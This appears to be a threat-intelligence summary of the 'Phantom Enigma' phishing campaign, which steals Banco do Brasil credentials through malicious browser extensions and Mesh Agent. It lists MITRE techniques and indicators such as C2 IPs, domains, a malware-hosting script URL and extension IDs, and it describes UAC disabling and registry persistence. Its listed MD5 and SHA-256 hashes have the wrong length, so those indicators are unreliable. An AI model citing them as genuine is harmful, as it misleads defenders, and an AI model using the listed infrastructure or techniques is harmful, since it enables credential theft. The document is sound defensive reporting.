Threat Research

Operation Phantom Enigma

PTsecurity-ESC
Operation Phantom Enigma

A malicious campaign named Phantom Enigma targets Brazilian users primarily through phishing emails distributing malicious browser extensions and Mesh Agent malware. The attackers use compromised company servers to send phishing emails and deploy sophisticated scripts to capture banking credentials, focusing on Banco do Brasil customers. #PhantomEnigma #MeshAgent #BancoDoBrasil

Keypoints

  • The Phantom Enigma campaign has been active since early 2025, mainly targeting users in Brazil but also affecting companies in Colombia, Czech Republic, Mexico, Russia, Vietnam, and others.
  • Attackers distribute malware via phishing emails that either contain malicious attachments or links directing victims to download files from attacker-controlled open directories.
  • The campaign uses a malicious browser extension for Google Chrome, Microsoft Edge, and Brave browsers to intercept and steal sensitive banking information, specifically targeting Banco do Brasil customers.
  • Two main attack chains are used: one deploying malicious browser extensions and the other involving remote administration malware like Mesh Agent and PDQ Connect Agent for wider network compromise.
  • The malicious PowerShell and BAT scripts perform virtualization checks, disable User Account Control (UAC), maintain persistence via registry modifications and shortcut alterations, and communicate with C2 servers to receive instructions.
  • Attack infrastructure includes multiple malicious domains and IP addresses, some sharing TLS certificates, facilitating stealthy command and control and data exfiltration.
  • Approximately 70 unique victim companies were identified, and the malicious extension was downloaded over 700 times from the Chrome Web Store before removal.
  • Attackers abuse compromised companies’ servers to send phishing emails, increasing the success rate of infections while focusing on Brazilian bank authentication credential theft.

MITRE Techniques

  • [T1583.001] Acquire Infrastructure: Domains – Attackers used domains such as .clientepj.com to host open directories for malware distribution (“domains .clientepj.com for the open directory”).
  • [T1583.004] Acquire Infrastructure: Server – Attackers acquired hosting services and set up web servers to distribute malware (“acquired a hosting service and set up a web server”).
  • [T1588.001] Obtain Capabilities: Malware – Development of PowerShell and BAT scripts to install malicious browser extensions (“attackers developed PowerShell and BAT scripts”).
  • [T1608.001] Stage Capabilities: Upload Malware – Malicious files including PowerShell scripts were placed in open directories during the attack (“placed malicious files in the open directory”).
  • [T1585.002] Establish Accounts: Email Accounts – Use of pre-created Gmail accounts to distribute phishing emails (“attackers used pre-created Gmail accounts”).
  • [T1566.001] Phishing: Spearphishing Attachment – Phishing emails contained malicious archives prompting victims to execute them (“phishing emails containing a malicious archive”).
  • [T1566.002] Phishing: Spearphishing Link – Phishing emails with links to download malicious files from attacker-controlled sites (“phishing emails with a link to download a malicious file”).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell scripts executed to install malicious extensions (“executed a PowerShell script to load a malicious extension”).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – BAT scripts used to check system services and download PowerShell scripts (“BAT scripts checking Warsaw Technology presence”).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – JavaScript code modified browser shortcuts to load malicious extensions (“used JavaScript code to modify LNK files”).
  • [T1204.002] User Execution: Malicious File – Victims required to execute one of several file types to trigger the attack (“victim run a file in one of three formats”).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence gained via registry key PWSecurity added to startup (“adds itself to the startup by modifying registry”).
  • [T1547.009] Boot or Logon Autostart Execution: Shortcut Modification – Modified LNK files to launch browsers with malicious extensions (“used LNK files to launch browsers and deploy extension”).
  • [T1176] Browser Extensions – Malicious browser extension used to collect and exfiltrate victim data (“used a malicious browser extension”).
  • [T1546.016] Event Triggered Execution: Installer Packages – Malicious MSI files signed to masquerade as legitimate applications (“signed malicious files as government ministry app”).
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – Scripts check for virtualization environments to evade analysis (“used PowerShell to check for virtualization”).
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control – Script disables UAC for stealthy execution (“disable UAC by changing EnableLUA registry value”).
  • [T1036.001] Masquerading: Invalid Code Signature – Use of fake digital signatures to disguise malware (“signed malicious files to disguise”).
  • [T1070.004] Indicator Removal: File Deletion – REMOVEKL command removes script files and terminates processes (“attackers used REMOVEKL to delete scripts”).
  • [T1070.009] Indicator Removal: Clear Persistence – Removal of autostart registry values to clear persistence (“attackers used REMOVEKL command”).
  • [T1007] System Service Discovery – BAT script checks for presence of Warsaw Technology service to identify Brazilian targets (“check for Warsaw Technology”).
  • [T1083] File and Directory Discovery – JavaScript scans user directories to find and modify browser shortcut files (“used JavaScript to scan user directories for .lnk files”).
  • [T1056.003] Input Capture: Web Portal Capture – Malicious extension captures user input from banking web portals (“used extension to collect data from banking systems”).
  • [T1071.001] Application Layer Protocol: Web Protocols – HTTP protocol used for command and control communication (“used HTTP protocol to transmit stolen data”).
  • [T1105] Ingress Tool Transfer – PowerShell downloads additional scripts from attacker servers (“Invoke-WebRequest used to download PowerShell script”).

Indicators of Compromise

  • [IP Address] Command and control and malware hosting – 142.54.185.178, 107.174.231.26
  • [Domain] Malicious infrastructure domains used for hosting and control – computadorpj.com, clientepj.com, financial-executive.com, atual2025.com, ranchocentral.com, servidor2025.com
  • [File Hashes] Malicious installer and script samples – examples include MD5: 0353a0dbc9f016da09303ee1a3b75d2f57, SHA-256: 5354498bae3cce0cbe6a0227ed33fe566f0e8fe4780f2a57743acc98f6859740d
  • [File Names] Malicious script and extension files – cliente.ps1 (PowerShell script), cliente.bat (BAT script), nplfchpahihleeejpjmodggckakhglee (malicious Chrome extension ID)
  • [URLs] Malicious phishing and C2 URLs – https://enota.clientepj.com/cliente.ps1, https://financial-executive.com/comando_temporario.php
  • [Extension IDs] Malicious Chrome Web Store extension identifiers – nplfchpahihleeejpjmodggckakhglee, cckjdiimhlanonhceggkfjlmjnenpmfm, lkpiodmpjdhhhkdhdbnncigggodgdfli

Read more: https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/operation-phantom-enigma